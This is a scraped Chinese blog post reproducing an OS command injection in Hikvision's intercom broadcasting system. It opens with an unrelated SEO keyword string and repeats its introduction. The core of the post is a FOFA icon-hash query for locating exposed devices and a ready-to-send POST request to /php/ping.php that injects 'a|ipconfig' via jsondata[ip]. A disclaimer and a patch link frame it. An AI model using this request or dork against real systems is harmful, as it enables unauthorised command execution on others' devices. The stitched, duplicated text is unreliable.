素材图库网站源码,建设赚钱的网站,网站模板制作,邓州企业网站文章目录 前言声明一、系统简介二、漏洞描述三、影响版本四、漏洞复现五、修复建议 前言
Hikvision Intercom Broadcasting System是中国海康威视#xff08;Hikvision#xff09;公司的一个对讲广播系统。 声明
请勿利用文章内的相关技术从事非法测试#xff0c;由于传播… 文章目录 前言声明一、系统简介二、漏洞描述三、影响版本四、漏洞复现五、修复建议 前言
Hikvision Intercom Broadcasting System是中国海康威视Hikvision公司的一个对讲广播系统。 声明
请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 一、系统简介
Hikvision Intercom Broadcasting System是中国海康威视Hikvision公司的一个对讲广播系统。
二、漏洞描述
Hikvision Intercom Broadcasting System是中国海康威视Hikvision公司的一个对讲广播系统。Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。
三、影响版本
海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE
四、漏洞复现
FOFAicon_hash“-1830859634”
漏洞链接https://127.0.0.1/php/ping.php
漏洞数据包
POST /php/ping.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Length: 40
Content-Type: application/x-www-form-urlencodedjsondata[ip]a|ipconfigjsondata[type]1五、修复建议
请到官网下载补丁https://www.spon.com.cn/
